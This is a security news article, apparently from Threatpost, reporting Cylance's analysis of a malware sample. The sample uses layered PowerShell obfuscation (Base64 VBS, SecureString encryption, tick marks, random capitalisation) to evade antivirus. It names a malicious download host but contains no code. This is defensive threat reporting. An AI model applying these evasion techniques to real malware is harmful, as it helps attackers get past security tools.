PowerShell Obfuscation Ups the Ante on Antivirus

The development fits a trend that sees threat actors turning to well-known, commodity malware, overcoming its easy detection with ever-better obfuscation methods.

A new malware sample using a rare obfuscation technique has been spotted that uses the features of PowerShell, a tool that comes built in to Microsoft Windows. Analysis from Cylance shows that the tactic succeeds in bypassing most antivirus products.

Cylance researchers stumbled across a malware file using a PowerShell obfuscation method while looking into a set of malicious scripts that had low antivirus detection. The file was a ZIP file containing both a PDF document and VBS script, and it was flagged by just three antivirus products.

It takes a page from other common obfuscation techniques, which include using packers to compress a malware program; encryption to hide its unique strings of code; or techniques that mutate malware cosmetics, such as the overall number of bytes in the program. All of these alter the hash and the signature of the malware so that common antivirus tools won’t flag it as a known malicious agent.

“These techniques change the overall structure of a piece of malware without altering its function,” explained researchers at Cylance, in a technical analysis posted Wednesday on the tactic. “Often, this has the overall result of creating layers which act to bury the ultimate payload, like the nested figures in a Russian doll.”

In the PowerShell gambit, the aforementioned VBS script used a rudimentary Base64 encoding to obfuscate the first layer. That VBS script then downloaded and executed a DAT file via PowerShell. The team found that the script used techniques like string-splitting through concatenation and variable assignment, as well as the use of tick marks and random letter capitalizations to split up the words or signatures that antivirus companies commonly rely upon for malicious PowerShell identification.

“The file 1cr.dat is where things got interesting,” the researchers explained. “It uses a method of string encryption inherent in C# called SecureString…commonly used to encrypt sensitive strings within applications using Microsoft’s built-in DPAPI.”

They added that the script itself downloaded the file “ravigel.com/top.dat” which was a ZIP archive containing a PE file encoded by the ordinal representation of each hex byte separated by a space character, and prefaced with the heading “google\r\n.”

Meanwhile, the actual payload is “a simple espionage tool widely known to the security community.”

“The cat-and-mouse game of detection and response isn’t new,” Kevin Livelli, director of threat intelligence at Cylance, told Threatpost. “Attackers, whether they’re advanced groups or common criminals, are astute observers of target defenses and adapt accordingly. Malware doesn’t have to be especially complicated or even new to be effective. Obfuscation gives attackers a simple and cheap way to get the job done until the industry adapts and attackers move on to the next technique.”

The development fits a trend that sees threat actors turning to commodity malware, overcoming the fact that its well-known fingerprints are easy to detect by implementing ever-better obfuscation methods.

The sheer volume of commodity malware out there ironically works in threat actors’ favor. “When the fingerprint of a piece of malware is known to all and is within the reach of everyone, the threat actor can hide amongst an impossibly large group of suspects. The payload signature is essentially rendered meaningless,” the researchers explained.

They added, “This trend runs counter to a widely-held assumption in the information security space which holds that highly customized malware paired with zero-day exploits are deserving of the most attention.”

Suggested articles